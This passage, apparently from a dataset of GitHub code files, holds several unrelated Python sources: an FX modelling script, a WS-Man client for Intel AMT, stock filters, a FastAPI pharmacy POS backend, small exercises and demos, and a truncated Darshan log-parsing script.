warm_start=False)\n etr.fit(X_fit.fillna(method='ffill').fillna(0), y_fit)\n\ns = pd.Series(etr.feature_importances_, index=X_fit.columns)\ns.sort(ascending=True)\n\ndef doplotA(y, y_pred):\n plot(y, y, 'k--', alpha=0.5)\n plot(y[ind_fit], y_pred[ind_fit], 'b.', alpha=0.5)\n plot(y[ind_eval], y_pred[ind_eval], 'g.', alpha=0.5)\n plot(y[ind_test], y_pred[ind_test], 'r.', alpha=0.5)\n\nfrom pylab import *\nion()\nfigure(3)\nclf()\nax = subplot(122)\ns.head(n=20).plot(ax=ax, kind='barh')\nfigure(4)\nclf()\nif YTYPE == 'linear':\n y_pred = etr.predict(X.fillna(method='ffill').fillna(0)) # TODO handle nan\n doplotA(y, y_pred)\n title('Extra Trees Pred for feature selection')\n\n# # really need to get this in a proper pipeline\n# i_features = np.argsort(etr.feature_importances_) < n_features\n# reduce_features = lambda x: x.iloc[:,i_features]\n# X_fit = reduce_features(X_fit)\n# X_test = reduce_features(X_test)\n# X_train = reduce_features(X_train)\n# X_eval = reduce_features(X_eval)\n# X = reduce_features(X)\n# \n# import xgboost as xgb\n# if YTYPE == 'linear':\n# model = xgb.XGBRegressor(base_score=0.5, colsample_bylevel=1, colsample_bytree=0.5, gamma=0, learning_rate=0.1,\n# max_delta_step=0, max_depth=3, min_child_weight=1, missing=None, n_estimators=100, nthread=-1,\n# 
objective='reg:linear', reg_alpha=0, reg_lambda=1, seed=2, silent=True, subsample=0.3)\n# model.fit(X_fit, y_fit, eval_set=[(X_fit, y_fit), (X_eval, y_eval), (X_test, y_test)])\n# elif YTYPE == 'sign':\n# model = xgb.XGBClassifier(base_score=0.5, colsample_bylevel=1, colsample_bytree=0.5, gamma=0, learning_rate=0.01,\n# max_delta_step=0, max_depth=3, min_child_weight=1, missing=None, n_estimators=1000, nthread=-1,\n# reg_alpha=0, reg_lambda=1, scale_pos_weight=1, seed=0, silent=True, subsample=1)\n# model.fit(X_fit, y_fit, eval_set=[(X_fit, y_fit), (X_eval, y_eval), (X_test, y_test)], eval_metric='auc')\n# \n# y_pred = model.predict(X)\n# \n# figure(1)\n# clf()\n# if YTYPE == 'linear':\n# doplotA(y, y_pred)\n# title('y vs y_pred {} (ndays = {})'.format(y_colname, ndays_pred))\n# \n# df_allfeatures['y_pred'] = y_pred\n# df_allfeatures['y'] = y\n# figure(2)\n# clf()\n# if YTYPE == 'linear':\n# ax = subplot(111)\n# df_allfeatures.iloc[ind_test][['y', 'y_pred']].plot(ax=ax)\n# title('y vs y_pred on test set\\n{} (ndays = {})'.format(y_colname, ndays_pred))\n# \n# \n# \n","repo_name":"cottrell/notebooks","sub_path":"fx/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"9670067743","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom . import wsmanData\nimport uuid\nimport requests\nfrom . 
import WryDict\nfrom time import sleep\n\n\nclass wsmanResource(object):\n '''\n Class to represent a resource on a wsman compatible server\n '''\n\n def __init__(self, target = None, is_ssl = False, username = None, password = None, resource = None, debug = False, showxml = False):\n '''\n Set up this resource\n\n @param target: the hostname or IP address of the wsman service\n @param is_ssl: should we communicate using SSL?\n @param resource: the identifier of the resource containing the settings we are interested in\n @param username: the username to log in with\n @param password: the password to log in with\n @param debug: enable debugging output\n @param showxml: enable output of XML transactions\n '''\n if is_ssl:\n scheme = 'https'\n else:\n scheme = 'http'\n port = wsmanData.AMT_PROTOCOL_PORT_MAP[scheme]\n self.target = scheme + \"://\" + target + \":\" + str(port) + \"/wsman\"\n self.resourceId = resource\n self.resourceUri = wsmanData.RESOURCE_URIS[self.resourceId]\n self.resource_methods = wsmanData.RESOURCE_METHODS[resource]\n self.username = username\n self.password = password\n self.debug = debug\n self.showxml = showxml\n\n def etree_to_dict(self, t):\n d = {t.tag : map(self.etree_to_dict, t.iterchildren())}\n d.update(('@' + k, v) for k, v in t.attrib.items())\n d['text'] = t.text\n return d\n\n def request(self, doc = None, params = {}):\n '''\n Send a request to the target and return the response\n\n '''\n params['uuid'] = uuid.uuid4()\n if enumerate:\n doc = doc % params\n else:\n doc = doc % params\n if self.showxml:\n print(\"===== Request =====\")\n print(doc)\n print(\"===================\")\n for _ in range(wsmanData.CONNECT_RETRIES + 1):\n try:\n if self.debug:\n print(\"Connecting to %s\" % (self.target,))\n resp = requests.post(\n self.target,\n timeout = (0.1, 5),\n headers = {'content-type': 'application/soap+xml;charset=UTF-8'},\n auth = requests.auth.HTTPDigestAuth(self.username, self.password),\n data = doc,\n allow_redirects = False,\n )\n if self.showxml:\n print(\"===== Response =====\")\n print(resp.content)\n print(\"====================\")\n resp.raise_for_status()\n return WryDict.WryDict.from_xml(resp.content)\n except:\n if self.debug:\n print(\"Failed, retrying\")\n sleep(wsmanData.CONNECT_DELAY)\n\n def get(self, setting = '', **kwargs):\n '''\n Send a get request and return the result\n\n @param setting: the setting to get the value of (None for all in this resources)\n '''\n extraHeader = ''\n if 'headerSelector' in kwargs and 'headerSelectorType' in kwargs:\n extraHeader = '%(headerSelector)s' % kwargs\n params = {\n 'uri': self.target,\n 'actionUri': wsmanData.ACTIONS_URIS['get'],\n 'resourceUri': self.resourceUri,\n 'setting': setting,\n 'extraHeader': extraHeader,\n 'body': self.resource_methods['get']\n }\n response = self.request(doc = wsmanData.WS_ENVELOPE, params = params)\n if len(setting) > 0:\n response = response[self.resourceId][setting]\n return response\n\n def put(self, **kwargs):\n '''\n Get the current values, fill in new values and put back\n\n @param **kwargs: zero or more settings to put back to the wsman server\n '''\n current = self.get()\n for k, v in kwargs.items():\n current[self.resourceId][k] = v\n params = {\n 'uri': self.target,\n 'actionUri': wsmanData.ACTIONS_URIS['put'],\n 'resourceUri': self.resourceUri,\n 'setting': '',\n 'extraHeader': '',\n 'body': current.to_xml\n }\n return self.request(doc = wsmanData.WS_ENVELOPE, params = params)\n\n# def delete(self, **kwargs):\n# '''\n# Delete an instance\n# '''\n# 
params = {\n# 'uri': self.target,\n# 'actionUri': ACTIONS_URIS['delete'],\n# 'resourceUri': self.resourceUri,\n# 'setting': '',\n# 'extraHeader': '',\n# 'body': self.resource_methods['delete'] % kwargs\n# }\n# return self.request(doc = WS_ENVELOPE, params = params)\n#\n# def Create(self, **kwargs):\n# '''\n# Create an instance\n# '''\n# params = {\n# 'uri': self.target,\n# 'actionUri': ACTIONS_URIS['create'],\n# 'resourceUri': self.resourceUri,\n# 'setting': '',\n# 'extraHeader': '',\n# 'body': self.resource_methods['create'] % kwargs\n# }\n# return self.request(doc = WS_ENVELOPE, params = params)\n\n def enumerate(self, **kwargs):\n '''\n Return all instances of this Resource\n '''\n params = {\n 'uri': self.target,\n 'actionUri': wsmanData.ACTIONS_URIS['enumerate'],\n 'resourceUri': self.resourceUri,\n 'setting': '',\n 'extraHeader': '',\n 'body': self.resource_methods['enumerate'] % kwargs\n }\n enum_response = self.request(doc = wsmanData.WS_ENUM_ENVELOPE, params = params)\n params['enumctx'] = enum_response['EnumerateResponse']['EnumerationContext']\n params['actionUri'] = wsmanData.ACTIONS_URIS['pull']\n output = WryDict.WryDict({self.resourceId:[]})\n while params['enumctx']:\n data = self.request(doc = wsmanData.WS_PULL_ENVELOPE, params = params)\n if 'EnumerationContext' not in data['PullResponse']:\n params['enumctx'] = None\n output[self.resourceId].append(data['PullResponse']['Items'][self.resourceId])\n return output\n\n def invoke(self, method, **kwargs):\n '''\n Call a method and return the result\n\n @param method: the method name to call\n '''\n if method not in self.resource_methods:\n raise Exception(\"Method '%s' not defined\" % method)\n extraHeader = ''\n if 'headerSelector' in kwargs and 'headerSelectorType' in kwargs:\n extraHeader = '%(headerSelector)s' % kwargs\n params = {\n 'uri': self.target,\n 'actionUri': self.resourceUri + \"/\" + method,\n 'resourceUri': self.resourceUri,\n 'setting': '',\n 'extraHeader': extraHeader,\n 'body': self.resource_methods[method] % kwargs\n }\n return self.request(doc = wsmanData.WS_ENVELOPE, params = params)\n\n","repo_name":"ocadotechnology/wry","sub_path":"wry/wsmanResource.py","file_name":"wsmanResource.py","file_ext":"py","file_size_in_byte":7820,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"2897347219","text":"#! 
/usr/bin/env python\n# -*- coding:utf8 -*-\n\n\"\"\"\n过滤器的参数都是动态参数,所以应用场景只是在选股的时候,\n而不能用于模型训练,选股需要过滤的是原始数据而不是选择结果,\n获取数据集最后一天的数据进行过滤计算\n\"\"\"\n\nfrom abc import ABCMeta, abstractclassmethod\nimport pandas as pd\n\nimport constants\nfrom datasource import TushareDatasource\nfrom persistence import DaoMysqlImpl, FileUtils, create_session, SectionStockMapping\nfrom tools import create_instance, to_params\n\nclass Filter(metaclass = ABCMeta):\n \n def __init__(self, param):\n self._param = param\n \n @abstractclassmethod\n def filter(self, data):\n pass\n \n# 价格过滤\nclass PriceFilter(Filter):\n \n def filter(self, data):\n result = data.iloc[len(data) - 1]['close'] < self._param \n if (not result):\n print(\"stock: \" + data.iloc[len(data) - 1][\"ts_code\"] + \"'s close price: \" + str(data.iloc[len(data) - 1]['close']) + \" over the price filter threshold and will be filtered\")\n return result\n \n# ST标识过滤\nclass STFilter(Filter):\n \n def __init__(self):\n persistence = DaoMysqlImpl()\n static_stock_list = persistence.select(\"select ts_code, name from static_stock_list\")\n self._static_stock_list = pd.DataFrame(static_stock_list, columns=['ts_code','name'])\n \n def filter(self, data):\n ts_code = data.iloc[len(data) - 1]['ts_code']\n if (len(self._static_stock_list[self._static_stock_list['ts_code'] == ts_code]) == 0):\n raise Exception(\"Stock {} not found in static_stock_list, need to be updated\".format(ts_code))\n name = self._static_stock_list[self._static_stock_list['ts_code'] == ts_code]['name'].iloc[0]\n result = name.find('ST') == -1\n if (not result):\n print(\"stock: \" + ts_code + \" is ST stock and will be filterd\")\n return result\n \n# 市盈率过滤\nclass PERatioFilter(Filter):\n \n def __init__(self, param, trade_date):\n self._param = param\n datasource = TushareDatasource()\n self._indicator_data = datasource.daily_indicator(trade_date=trade_date)\n print(self._indicator_data)\n \n def filter(self, data):\n ts_code = data.iloc[len(data) - 1]['ts_code']\n result = True\n try:\n if (len(self._indicator_data) > 0 and not pd.isnull(self._indicator_data[self._indicator_data['ts_code'] == ts_code]['pe'].iloc[0])):\n result = self._indicator_data[self._indicator_data['ts_code'] == ts_code]['pe'].iloc[0] < self._param\n else:\n #获取不到市盈率,有可能是在亏损 \n result = False\n if (not result):\n print(\"stock: \" + ts_code + \"'s pe: \" + str(self._indicator_data[self._indicator_data['ts_code'] == ts_code]['pe'].iloc[0]) + \" over the pe filter threshold and will be filtered\")\n except Exception:\n #停牌\n result = False\n return result\n \n# 次新股过滤\nclass NewStockFilter(Filter):\n \n def __init__(self, param):\n self._param = param\n \n def filter(self, data):\n return len(data) > int(self._param)\n \n# 板块过滤\nclass SectionFilter(Filter):\n \n def __init__(self, params):\n session = create_session()\n section_stocking_mapping_list = session.query(SectionStockMapping).filter(SectionStockMapping.section_code.in_(params)).all()\n self._stock_set = set(list(map(lambda item : item.ts_code, section_stocking_mapping_list)))\n \n def filter(self, data):\n stock = data.iloc[len(data) - 1]['ts_code']\n return stock in self._stock_set\n \n# 筛选\ndef filter_stock(filter_list, data):\n if (len(filter_list) == 0):\n return True\n for filter in filter_list:\n if (not filter.filter(data)):\n return False\n return True\n \ndef create_filter_list(filters=''):\n filter_list = []\n if filters == '':\n return filter_list\n filter_exp_list = filters.split('|')\n if len(filter_exp_list) > 0:\n for filter in 
filter_exp_list:\n filter_with_param = filter.split('_')\n if len(filter_with_param) > 1:\n filter_list.append(create_instance('filter', filter_with_param[0], to_params(filter_with_param[1])))\n else:\n filter_list.append(create_instance('filter', filter_with_param[0]))\n return filter_list\n\ndef to_params(str):\n if (str.find(\"[\") != -1 and str.find(\"]\") != -1):\n params = list(map(lambda str: type_conversion(str), str.split(\"-\")))\n return params\n else:\n return type_conversion(str)\n \ndef type_conversion(str):\n try:\n return int(str)\n except ValueError:\n try:\n return float(str)\n except ValueError:\n return str\n\nif __name__ == '__main__':\n data = FileUtils.load(constants.DATA_PATH + '/stock/688667.SH.pkl')\n data1 = FileUtils.load(constants.DATA_PATH + '/stock/600671.SH.pkl')\n trade_date = data.iloc[len(data) - 1]['trade_date']\n filter_list = []\n filter_list.append(PriceFilter(200))\n filter_list.append(STFilter())\n filter_list.append(PERatioFilter(50, trade_date))\n filter_list.append(SectionFilter(['BK0481']))\n for filter in filter_list:\n print('aaaa' + str(filter.filter(data)))\n print('bbbb' + str(filter.filter(data1)))\n \n filter_list1 = create_filter_list('PriceFilter_200|STFilter|SectionFilter_[BK0481]')\n for filter in filter_list1:\n print('aaaa' + str(filter.filter(data)))\n print('bbbb' + str(filter.filter(data1)))\n ","repo_name":"finley007/Stock","sub_path":"finley/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":5710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43276097792","text":"from fastapi import FastAPI, Depends, Response\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom Models import Databases\nfrom Controllers.EmployeeController import employee_routes\nfrom dotenv import load_dotenv\nfrom Controllers.ClientController import cliente_routes\nfrom Controllers.TransactionsController import transaction_routes\nfrom Controllers.ProductController import product_routes\nfrom Controllers.StoreController import store_routes\nfrom Controllers.ProviderController import provider_routes\nfrom Controllers.StockController import stock_routes\nfrom Requests.EmployeeRequest import EmployeeAuth\nfrom jwtFunctions import verify_cashier_access, verify_inventory_manager_access, verify_credentials, write_token\nfrom responseHelper import *\n\nuwuAPI = FastAPI(title=\"FarmaciauwuAPI\", description=\"API para mi POS\", version=\"2.0.0\")\nuwuAPI.include_router(employee_routes, prefix=\"/employee\")\nuwuAPI.include_router(cliente_routes, prefix=\"/client\", dependencies=[Depends(verify_cashier_access)])\nuwuAPI.include_router(transaction_routes, prefix=\"/transaction\")\nuwuAPI.include_router(product_routes, prefix=\"/product\")\nuwuAPI.include_router(store_routes, prefix=\"/store\")\nuwuAPI.include_router(provider_routes, prefix=\"/provider\", dependencies=[Depends(verify_inventory_manager_access)])\nuwuAPI.include_router(stock_routes, prefix=\"/stock\")\n\nuwuAPI.add_middleware(CORSMiddleware, allow_origins=['*'],\n allow_credentials=True,\n allow_methods=[\"GET\", \"PUT\", \"POST\", \"DELETE\"],\n allow_headers=[\"*\"], )\n\n\n@uwuAPI.on_event(\"startup\")\ndef startup():\n if Databases.maria.is_closed():\n Databases.maria.connect()\n\n\n@uwuAPI.on_event(\"shutdown\")\ndef shutdown():\n if not Databases.maria.is_closed():\n Databases.maria.close()\n\n\n@uwuAPI.post(\"/login\", responses={\n 200: set_custom_response(\"OK\", {\"message\": \"Login successful\", \"token\": 
\"token_uwu\"}),\n 400: set_custom_response(\"Bad request\", {\"detail\": {\"message\": \"Incorrect password\"}}),\n 404: set_404_response()\n}, tags=[\"Login\"])\nasync def login(user: EmployeeAuth, response: Response):\n info, pos = verify_credentials(user, True)\n token = write_token(info)\n response.set_cookie(key=\"token_c\", value=token, httponly=True)\n return {\"message\": \"Login successful\", \"token\": token, \"position\": pos}\n\n\n@uwuAPI.post(\"/logout\", tags=[\"Logout\"])\nasync def logout(response: Response):\n response.delete_cookie(key=\"token_c\")\n return {\"message\": \"Logout successful\"}\n\n\nload_dotenv()\n","repo_name":"FaridCG343/FarmaciauwuAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33711843214","text":"import pytest\nimport magma as m\nfrom mantle.coreir.LUT import LUT\nfrom magma.testing import check_files_equal\n\n\n@pytest.mark.skip(reason='Abort 6')\ndef test_coreir_lut():\n class Test(m.Circuit):\n name = \"test_coreir_lut3\"\n IO = [\"I\", m.In(m.Bits(3)), \"O\", Out(Bit)]\n @classmethod\n def definition(cls):\n lut3 = LUT(0xDE, 3)\n for i in range(3):\n m.wire(cls.I[i], getattr(lut3, \"I{}\".format(i)))\n m.wire(lut3.O, cls.O)\n\n m.compile(\"build/test_lut3\", Test, output=\"coreir\")\n assert check_files_equal(__file__,\n \"build/test_lut3.json\", \"gold/test_lut3.json\")\n","repo_name":"bbPeng98/DSE-framework-of-PRAD","sub_path":"MetaMapper/MetaMapper/src/mantle/tests/test_coreir/test_lut.py","file_name":"test_lut.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8222815545","text":"import operator\n\n\ndef main(binary_fn):\n\tprint(f\"binary function: {binary_fn}\\n\")\n\n\tright = 0\n\twhile True:\n\t\tsequence = get_sequence(right, binary_fn)\n\n\t\tif is_monotonic(sequence):\n\t\t\tprint(f\"right: {right}, monotonic sequence: {sequence}\\n\")\n\n\t\tright += 1\n\n\t\t# if right % 1000 == 0:\n\t\t# \tprint(right)\n\n\ndef get_sequence(right, binary_fn):\n\t\"\"\"\n\tThe sequence lengths. 
See the README for the full sequences.\n\t1 -> 0b001 -> 2 ** (0 + 1) -> 2\n\t2 -> 0b010 -> 2 ** (1 + 1) -> 4\n\t3 -> 0b011 -> 2 ** (1 + 1) -> 4\n\t4 -> 0b100 -> 2 ** (2 + 1) -> 8\n\t\"\"\"\n\tsequence = []\n\n\tfor left in range(2 ** (get_most_significant_bit_index(right) + 1)):\n\t\tsequence.append(binary_fn(left, right))\n\n\treturn sequence\n\n\ndef get_most_significant_bit_index(n):\n\t\"\"\"\n\tSee https://stackoverflow.com/a/4970859/13279557\n\t\"\"\"\n\ti = 0\n\n\tn >>= 1\n\twhile (n > 0):\n\t\ti += 1\n\t\tn >>= 1\n\n\treturn i\n\n\ndef is_monotonic(sequence):\n\tsequence_len = len(sequence)\n\n\tif sequence_len <= 1:\n\t\treturn True\n\n\tstart_slope_direction = None\n\n\tfor i in range(0, sequence_len - 1):\n\t\tslope_direction = get_slope_direction(sequence[i], sequence[i + 1])\n\n\t\tif start_slope_direction == None and slope_direction != 0:\n\t\t\tstart_slope_direction = slope_direction\n\t\telif slope_direction == -1 and start_slope_direction == 1:\n\t\t\treturn False\n\t\telif slope_direction == 1 and start_slope_direction == -1:\n\t\t\treturn False\n\n\treturn True\n\n\ndef get_slope_direction(a, b):\n\tn = b - a\n\n\tif n > 0:\n\t\treturn 1\n\telif n == 0:\n\t\treturn 0\n\telse:\n\t\treturn -1\n\n\nif __name__ == \"__main__\":\n\tbinary_fn = operator.and_\n\t# binary_fn = operator.or_\n\t# binary_fn = operator.xor\n\n\tmain(binary_fn)","repo_name":"MyNameIsTrez/Non-Monotonic-AND-Sequence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28969811614","text":"\"\"\"\nasyncio.Queue\n\nasyncio提供了队列(Queue)对象,实现协程间的通信,与queue.Queue对于线程和\nmultiprocessing.Queue对于进程的意义相同。\n\n最经典的案例莫过于生产/消费模型。\n\"\"\"\n\nimport asyncio\nimport random\nimport logging\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s - %(levelname)s - %(message)s\"\n)\n\n\nasync def producer(q):\n for i in range(10):\n # simulate i/o operation\n await asyncio.sleep(random.randint(1,2))\n item = \"item(%d)\" % i\n await q.put(item)\n logging.info(\"produce %s\" % item)\n \n # indicate producing stop\n await q.put(None)\n\n\nasync def consumer(q):\n while True:\n item = await q.get()\n logging.info(\"consumer get %s\" % item)\n \n if item is None:\n break\n\n\nasync def main():\n q = asyncio.Queue()\n await asyncio.gather(*(\n producer(q), consumer(q)\n ))\n\n\nloop = asyncio.get_event_loop()\ntry:\n loop.run_until_complete(main())\nfinally:\n loop.close()\n","repo_name":"scofieldchen/learn-python","sub_path":"concurrency/async/asyncio_queue.py","file_name":"asyncio_queue.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27308561764","text":"\"\"\"\nThis Module implements time series models using R's tscount package\nvia the rpy2 library\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom rpy2.robjects import pandas2ri\npandas2ri.activate()\nfrom rpy2.robjects import r\nfrom rpy2.rlike.container import TaggedList\nfrom rpy2.robjects.packages import importr\nfrom infodenguepredict.data.infodengue import get_alerta_table\n\ndef build_model(data):\n model = tsglm(data.casos, model=TaggedList([52, 3], tags=['past_obs', 'past_mean']), distr='nbinom')\n return model\n\ndef plot_forecast(data, fcast):\n index = pd.date_range(start=data.index.max(), periods=len(fcast[3]) + 1, freq='W')[1:]\n forecast = pd.Series(fcast[3], 
index=index)\n    lowerpi = pd.Series(fcast[4], index=index)\n    upperpi = pd.Series(fcast[5], index=index)\n    plt.plot(data.index, data.casos_est, color='b', alpha=0.5)\n    plt.plot(forecast.index, forecast.values, color='red')\n    plt.fill_between(forecast.index,\n                     lowerpi.values,\n                     upperpi.values,\n                     alpha=0.2, color='red')\n\n\nif __name__ == \"__main__\":\n    data = get_alerta_table(3304557) # Nova Iguaçu: 3303609\n    tscount = importr('tscount')\n    tsglm = r('tsglm')\n\n\n\n    model = build_model(data)\n    print(r.summary(model))\n    r.plot(model)\n    # fcast = forecast.forecast(model, h=5, level=95.0)\n    # print(fcast[3], fcast[4], fcast[5])\n    # plot_forecast(data=data, fcast=fcast)\n    # plt.show()\n\n\n\n\n","repo_name":"AlertaDengue/InfoDenguePredict","sub_path":"infodenguepredict/models/R_tscount.py","file_name":"R_tscount.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"28543139949","text":"decimal = eval(input('Enter a decimal value:'))\noriginal = decimal\nbinary = ''\nwhile decimal != 0:\n    \n    binary = str(decimal%2)+binary\n    decimal = decimal //2\n    \n    \n\nprint('The decimal value {} converted to binary is {}'.format(original,binary))","repo_name":"huai0216/python","sub_path":"week5/decimaltobinary.py","file_name":"decimaltobinary.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70550460081","text":"'''\nGiven a word, you need to judge whether the usage of capitals in it is right or not.\n\nWe define the usage of capitals in a word to be right when one of the following cases holds:\n\nAll letters in this word are capitals, like \"USA\".\nAll letters in this word are not capitals, like \"leetcode\".\nOnly the first letter in this word is capital, like \"Google\".\nOtherwise, we define that this word doesn't use capitals in a right way.\n \n\nExample 1:\n\nInput: \"USA\"\nOutput: True\n \n\nExample 2:\n\nInput: \"FlaG\"\nOutput: False\n'''\nclass Solution(object):\n    def detectCapitalUse(self, word):\n        \"\"\"\n        :type word: str\n        :rtype: bool\n        \"\"\"\n        follow_small = False\n        follow_big = False\n        if ord(word[0])>=ord('A') and ord(word[0])<=ord('Z'):\n            for i in range(1,len(word)):\n                if ord(word[i])>=ord('a'):\n                    follow_small = True\n                    if follow_big:\n                        return False\n                if ord(word[i])<=ord('Z'):\n                    follow_big = True\n                    if follow_small:\n                        return False\n            return True\n        else:\n            for i in range(1,len(word)):\n                if ord(word[i])<=ord('Z'):\n                    return False\n            return True\n        \n        \n        \n","repo_name":"csrunner/leetcode","sub_path":"520_detect_capital.py","file_name":"520_detect_capital.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12458320074","text":"n = int(input(\"Cantidad docentes?\")) \n\ndicCategoria = {1:25000 , 2:30000 , 3:40000 , 4:45000 , 5:60000}\nlstDocentes = []\ntotalHonorarios= 0 \n\nfor i in range (1 , n+1): \n    print(\"\\nDatos del docente #\" , i) \n    datDocente = {} \n    ced = input(\"Cedula?\") \n    datDocente[\"ced\"] = ced\n    datDocente[\"nombre\"] = input(\"Nombre: \") \n    datDocente[\"categoria\"] = int(input(\"Categoria (1-5): \")) \n    datDocente[\"horas_hab\"] = int(input(\"Horas laboradas: \")) \n    datDocente[\"honorarios\"] = dicCategoria.get(datDocente[\"categoria\"] , 0) * datDocente[\"horas_hab\"] \n\n    totalHonorarios += datDocente[\"honorarios\"]\n\n    lstDocentes.append(datDocente)\n\n\n\nprint(\"\\n\\n\" , \"=\" *30) \nprint(\"INFORME\") \nprint(\"=\" *30) \nprint(\"NOMBRE\\t\\tHONORARIOS\") \nprint(\"=\" *30) \n\n\"\"\" for d in lstDocentes: \n    print(f\"{d['nombre']}\\t\\t${d['honorarios']:,}\") \"\"\"\n\nfor i in range (len(lstDocentes)): \n    print(f\"{lstDocentes[i]['nombre']}\\t\\t${lstDocentes[i]['honorarios']:,}\") \n\n\nprint(\"\\n\\n\",\"=\" *30) \nprint(f\"Total honorarios: {totalHonorarios:,}\") ","repo_name":"Serranomanuel/campuslandarchivos","sub_path":"11 diccionarios/inst-listado.py","file_name":"inst-listado.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8181392156","text":"# 주차타워 구현!\r\n# 조건: 1층 ~ 5층, 층별로 1대만 주차\r\n# 차량번호: 숫자 4자리\r\n# 기능:\r\n# 1) 차량 입고\r\n# 2) 차량 출고\r\n# 3) 차량 조회\r\n# 4) 프로그램 종료\r\n\r\n#설정\r\nmax_car = 5 # 최대 5대\r\ncar_cnt = 0 # 주차 대수 카운트\r\n\r\n#tower = []\r\n# 리스트 컴프리핸슨 기법!\r\n# 1.List Comprehension\r\ntower = [\"\" for i in range(max_car)]\r\n\r\n# 2.for + list.append()\r\n# tower = []\r\n# for i in range(max_car):\r\n#     tower.append(\"\")\r\n    #[\"\",\"\",\"\",\"\",\"\"]\r\nwhile True:\r\n    print(\"=\"*50)\r\n    print(\"== 주차 타워 시스템 ver1.1 ==\")\r\n    print(\"=\" * 50)\r\n    print(\"= 1.입고\")\r\n    print(\"= 2.출고\")\r\n    print(\"= 3.조회\")\r\n    print(\"= 4.종료\")\r\n    print(\"=\" * 50)\r\n\r\n    while True:\r\n        select_num = int(input(\">>번호: \"))\r\n        if 4>=select_num >= 1:\r\n            break\r\n        else:\r\n            print(\"MSG: 올바른 번호를 입력하세요.\")\r\n    if select_num == 1: # 입고\r\n# 입고1.주차타워 공간 확인\r\n        if car_cnt < max_car: #입고\r\n            car_num = input(\">>입고: \")\r\n            for i, car in enumerate(tower):\r\n                if car == \"\":\r\n                    tower[i] = car_num\r\n                    car_cnt += 1\r\n                    break\r\n        else:\r\n            print(\"MSG: 입고 불가,다른 곳으로 가..\")\r\n    elif select_num == 2: # 출고\r\n        # 1.차량번호\r\n        car_num = input(\">>출고: \") \r\n        # 2.주차타워 check 차량번호\r\n        if car_num in tower:\r\n            for i, car in enumerate(tower):\r\n                if car==car_num: #출고\r\n                    tower[i] = \"\"#타워에서 차량제거\r\n                    car_cnt -= 1 # 현재 주차대수 동기화\r\n                    break\r\n        else:\r\n            print(\"MSG: 해당 번호로 입고 된 차량이 없습니다.\")\r\n        # 2-1. 있으면 -> 출고(tower 해당 차량 제거, car_cnt_-1)\r\n        # 2-2. 
없으면 -> \"입고 된 차량 x\"\r\n pass\r\n elif select_num == 3: # 조회\r\n for i in range(len(tower)-1, -1, -1):\r\n print(f\">{i+1}층 {tower[i]}\")\r\n elif select_num == 4: # 종료\r\n print(\"MSG: 프로그램을 종료합니다.\")\r\n exit()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"pilyunsun/Python_Basic","sub_path":"project_paking_tower/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5225332255","text":"#!/usr/local/bin/python3\n\nimport os\nimport subprocess\n\ndarshan_log_dir = \"/Users/ddai/Documents/test-data-sets/intrepid/2013\"\nfile_size_map_file = \"/Users/ddai/Documents/test-data-sets/processed.txt\"\nparsed_file_path = \"/tmp/1.txt\"\n\ng = os.walk(darshan_log_dir)\n\nfile_size_map = {}\nhelper_map = {}\n\nfor path, _, files in g:\n for file in files:\n if (not file.endswith(\"bz2\")):\n continue\n file_path = os.path.join(path, file)\n print (file_path)\n parsed_file_output = open(parsed_file_path, \"w\")\n command = \"./darshan-parser \" + file_path\n p = subprocess.Popen(command, shell=True, stdout=parsed_file_output).wait()\n parsed_file_output.close()\n\n input_log = open(parsed_file_path, \"r\")\n for line in input_log:\n if line.startswith(\"#\"):\n continue\n str = line.split()\n if (len(str) == 0):\n continue\n \n file_name_id = int(str[1])\n\n # if this file has not been visisted before, initialize its size as 0\n if not file_name_id in file_size_map.keys():\n file_size_map[file_name_id] = 0\n helper_map[file_name_id] = 0\n # CP_SIZE_AT_OPEN may be smaller than the recorded size!\n \n if (str[2] == \"CP_BYTES_WRITTEN\"): # index: 48\n helper_map[file_name_id] = int(str[3])\n\n if (str[2] == \"CP_SIZE_AT_OPEN\"): # index: 139\n size_at_open = int(str[3])\n new_file_size = size_at_open + helper_map[file_name_id]\n 